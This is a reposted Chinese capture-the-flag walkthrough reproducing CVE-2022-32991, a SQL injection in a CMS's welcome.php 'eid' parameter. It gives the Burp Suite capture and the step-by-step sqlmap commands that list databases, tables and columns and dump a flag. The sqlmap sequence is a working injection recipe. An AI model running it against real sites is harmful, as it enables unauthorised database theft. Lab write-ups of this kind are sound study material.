CVE-2022-32991靶场复现
  rKeEjcARIgc2 2023年11月20日 27 0

靶场环境:<br />image.png

题目提示了该CMS的welcome.php中存在SQL注入攻击。

CVE官方给出的提示:<br />image.png

welcome.php页面存在SQL注入,并且这个参数是eid

打开靶场环境:<br />image.png

页面是一个登陆注册的界面

用户注册:<br />image.png

1 01@0.com 123456 123456 点击Register(注册) 注册成功

用户登录:<br />image.png

01@0.com 123456 点击Login(登录)

登陆成功:<br />image.png

箭头所指方向存在welcome.php文件但是参数不是eid,而是p 下方有Start开始按钮,点点试试,看看有没有新的发现

image.png<br />image.png

存在了eid参数 由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打

复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包<br />image.png<br />image.png<br />创建一个txt文件,将数据包复制到这个txt文件里面<br />image.pngimage.png<br />注入前的准备工作,了解sqlmap的部分参数

  1. -r 加载文件中的HTTP请求(本地保存的请求包txt文件)
  2. -D 选择使用哪个数据库
  3. -T 选择使用哪个表
  4. -C 选择使用哪个列
  5. --dbs 列出所有的数据库
  6. --batch 自动选择yes
  7. --tables 列出当前的表
  8. --columns 列出当前的列
  9. --dump 获取字段中的数据

启动sqlmap加载flag.txt文件HTTP请求并列出其所有数据库<br />进入到桌面目录下(注意这是我的flag.txt文件保存的位置)<br />执行如下命令:<br />sqlmap -r flag.txt --dbs --batch<br />回显如下:<br />image.png<br />可以看到存在数据库ctf(注意执行命令后,加载可能会慢点,不必慌张。)<br />接下来列出数据库ctf里面的所有数据表<br />执行如下命令:<br />sqlmap -r flag.txt -D ctf --tables --batch<br />回显如下:<br />image.png<br />image.png<br />可以看到数据库ctf里面存在数据表flag,猜测数据表flag里面存在flag(严谨一点)<br />接着爆数据表flag里面的字段<br />执行如下命令:<br />sqlmap -r flag.txt -D ctf -T flag --columns --batch<br />回显如下:<br />image.png<br />数据表flag里面存在字段flag<br />最后爆flag字段里面的内容<br />执行如下命令:<br />sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch<br />回显如下:<br />image.png<br />得出flag:<br />flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3}<br />原文链接:https://blog.csdn.net/m0_73734159/article/details/134083293?spm=1001.2014.3001.5501

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月20日 0

暂无评论

推荐阅读
  5NWiQFAVeqgX   2024年05月17日   32   0   0 网络安全
  pTtIhLb24H2d   2024年05月17日   34   0   0 网络安全
  OKgNPeBk991j   2024年05月18日   47   0   0 网络安全
  rKgO6TN7xbYO   2024年05月17日   38   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   53   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   36   0   0 网络安全
  YOkriIV1Am1d   2024年05月20日   39   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   37   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   40   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   34   0   0 网络安全
rKeEjcARIgc2